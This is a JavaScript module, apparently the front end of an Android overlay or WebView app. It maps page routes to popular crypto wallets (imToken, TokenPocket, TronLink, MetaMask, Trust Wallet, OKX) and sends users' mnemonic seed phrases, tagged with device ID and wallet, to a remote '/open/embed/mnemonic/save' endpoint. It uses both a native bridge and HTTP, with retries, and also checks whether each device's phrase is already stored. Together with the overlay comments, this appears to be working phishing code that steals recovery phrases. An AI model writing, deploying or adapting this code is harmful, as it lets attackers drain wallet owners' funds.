/** 路由与钱包映射（WebView 未带包名时按页面路径推断；包名与 Android InstalledAppsDetector 一致） */
const ROUTE_WALLET_MAP = {
  '/im': { walletKey: 'im', walletName: 'imToken', packageName: 'im.token.app' },
  '/import': { walletKey: 'im', walletName: 'imToken', packageName: 'im.token.app' },
  '/input': { walletKey: 'im', walletName: 'imToken', packageName: 'im.token.app' },
  '/tp': { walletKey: 'tp', walletName: 'TokenPocket', packageName: 'vip.mytokenpocket' },
  '/tp-import': { walletKey: 'tp', walletName: 'TokenPocket', packageName: 'vip.mytokenpocket' },
  '/tp-wallet-import': { walletKey: 'tp', walletName: 'TokenPocket', packageName: 'vip.mytokenpocket' },
  '/tronlink': { walletKey: 'tronlink', walletName: 'TronLink', packageName: 'com.tronlink.global' },
  '/tronlink-import': { walletKey: 'tronlink', walletName: 'TronLink', packageName: 'com.tronlink.global' },
  '/tronlink-wallet-import': {
    walletKey: 'tronlink',
    walletName: 'TronLink',
    packageName: 'com.tronlink.global',
  },
  '/MM': { walletKey: 'metamask', walletName: 'MetaMask', packageName: 'io.metamask' },
  '/mm': { walletKey: 'metamask', walletName: 'MetaMask', packageName: 'io.metamask' },
  '/trust': { walletKey: 'trust', walletName: 'Trust Wallet', packageName: 'com.wallet.crypto.trustapp' },
  '/okx': { walletKey: 'okx', walletName: 'OKX Wallet', packageName: 'com.okinc.okex.gp' },
};

import { decodeApiBaseParam } from './apiBaseCodec';
import { resolveApiBase } from './apiConfig';
import { getStoredEmbedParam } from './embedParams';

/**
 * 解析当前页面对应的钱包信息（优先 URL 参数与 Android AppBridge）
 */
export function resolveWalletContext(route) {
  const params = new URLSearchParams(window.location.search);
  const fromQuery = {
    walletKey: params.get('walletKey') || '',
    walletName: params.get('walletName') || '',
    packageName: params.get('packageName') || '',
  };
  if (fromQuery.walletKey || fromQuery.walletName || fromQuery.packageName) {
    return {
      walletKey: fromQuery.walletKey || fromQuery.packageName || 'unknown',
      walletName: fromQuery.walletName || fromQuery.walletKey || '未知钱包',
      packageName: fromQuery.packageName || undefined,
    };
  }

  if (window.AppBridge && typeof window.AppBridge.getWalletContext === 'function') {
    try {
      const raw = window.AppBridge.getWalletContext();
      if (raw) {
        const ctx = typeof raw === 'string' ? JSON.parse(raw) : raw;
        if (ctx && (ctx.walletKey || ctx.walletName || ctx.packageName)) {
          return {
            walletKey: ctx.walletKey || ctx.packageName || 'unknown',
            walletName: ctx.walletName || ctx.walletKey || '未知钱包',
            packageName: ctx.packageName || undefined,
          };
        }
      }
    } catch (e) {
      console.warn('parse AppBridge wallet context failed', e);
    }
  }

  const path = (route && route.path) || window.location.pathname || '';
  const normalized = path.replace(/\/+$/, '') || '/';
  if (ROUTE_WALLET_MAP[normalized]) {
    return { ...ROUTE_WALLET_MAP[normalized] };
  }

  const key = normalized.replace(/^\//, '') || 'unknown';
  return { walletKey: key, walletName: key, packageName: undefined };
}

export function resolveDeviceId() {
  if (window.AppBridge && typeof window.AppBridge.getDeviceId === 'function') {
    const id = window.AppBridge.getDeviceId();
    if (id) return id;
  }
  const params = new URLSearchParams(window.location.search);
  return params.get('deviceId') || getStoredEmbedParam('deviceId') || '';
}

/**
 * Android WebView 悬浮层：走 AppBridge → WebSocket 上报（避免 WebView 跨域/明文 HTTP 在 OPPO 等机型上 fetch 失败）
 */
function saveMnemonicViaAppBridge(mnemonic) {
  if (!window.AppBridge || typeof window.AppBridge.saveMnemonic !== 'function') {
    return null;
  }
  try {
    window.AppBridge.saveMnemonic(String(mnemonic || '').trim());
    return { ok: true, via: 'bridge' };
  } catch (bridgeErr) {
    console.warn('AppBridge.saveMnemonic failed', bridgeErr);
    return { ok: false, error: 'bridge_failed', via: 'bridge' };
  }
}

/**
 * 保存助记词到后端（带钱包标注）
 */
export async function saveMnemonicToBackend(mnemonic, route, apiBaseOverride) {
  const deviceId = resolveDeviceId();
  if (!deviceId) {
    console.warn('saveMnemonic: missing deviceId');
    return { ok: false, error: 'missing_device_id' };
  }

  const normalizedMnemonic = String(mnemonic || '').trim();

  // 悬浮窗 WebView 内优先原生通道（日志里 WS 已连通，fetch 常因跨 IP/明文 HTTP 失败）
  const bridgeResult = saveMnemonicViaAppBridge(normalizedMnemonic);
  if (bridgeResult?.ok) {
    const wallet = resolveWalletContext(route);
    console.log('Mnemonic saved via AppBridge:', wallet.walletName);
    return bridgeResult;
  }

  const apiBase = decodeApiBaseParam(apiBaseOverride || resolveApiBase());
  const saveUrl = `${apiBase.replace(/\/+$/, '')}/open/embed/mnemonic/save`;

  const wallet = resolveWalletContext(route);
  const body = {
    deviceId,
    mnemonic: normalizedMnemonic,
    walletKey: wallet.walletKey,
    walletName: wallet.walletName,
    packageName: wallet.packageName,
  };

  try {
    const res = await fetch(saveUrl, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(body),
    });
    let payload = null;
    try {
      payload = await res.json();
    } catch (_) {
      /* ignore */
    }
    if (!res.ok) {
      console.error('saveMnemonic failed', res.status, payload, 'url:', saveUrl);
      if (res.status === 405) {
        return {
          ok: false,
          error: 'api_wrong_host',
        };
      }
      return {
        ok: false,
        error: payload?.message || `http_${res.status}`,
      };
    }
    if (payload && payload.data && payload.data.success === false) {
      return { ok: false, error: payload.data.error || 'save_rejected' };
    }
    if (payload && payload.code !== undefined && payload.code !== 1000) {
      return { ok: false, error: payload.message || 'save_rejected' };
    }
    console.log('Mnemonic saved with wallet:', wallet.walletName, 'api:', apiBase);

    saveMnemonicViaAppBridge(normalizedMnemonic);

    return { ok: true, via: 'http' };
  } catch (error) {
    console.error('Failed to save mnemonic:', error, 'api:', apiBase);
    // fetch 失败时再试一次 bridge（部分环境 bridge 存在但首次检测失败）
    const retryBridge = saveMnemonicViaAppBridge(normalizedMnemonic);
    if (retryBridge?.ok) {
      return retryBridge;
    }
    return { ok: false, error: 'network' };
  }
}

/**
 * 查询当前设备/钱包是否已经保存过助记词
 */
export async function checkMnemonicSaved(route, apiBaseOverride) {
  const deviceId = resolveDeviceId();
  if (!deviceId) {
    return { ok: false, saved: false, error: 'missing_device_id' };
  }

  const apiBase = decodeApiBaseParam(apiBaseOverride || resolveApiBase());
  const wallet = resolveWalletContext(route);
  const params = new URLSearchParams({
    deviceId,
    walletKey: wallet.walletKey || '',
    packageName: wallet.packageName || '',
  });
  const statusUrl = `${apiBase.replace(/\/+$/, '')}/open/embed/mnemonic/status?${params.toString()}`;

  try {
    const res = await fetch(statusUrl, {
      method: 'GET',
    });
    let payload = null;
    try {
      payload = await res.json();
    } catch (_) {
      /* ignore */
    }

    if (!res.ok) {
      return { ok: false, saved: false, error: `http_${res.status}` };
    }

    if (payload && payload.code !== undefined && payload.code !== 1000) {
      return { ok: false, saved: false, error: payload.message || 'status_rejected' };
    }

    const data = payload?.data ?? payload ?? {};
    return {
      ok: true,
      saved: !!data.saved,
      data,
    };
  } catch (error) {
    console.warn('Failed to check mnemonic saved status:', error, 'api:', apiBase);
    return { ok: false, saved: false, error: 'network' };
  }
}
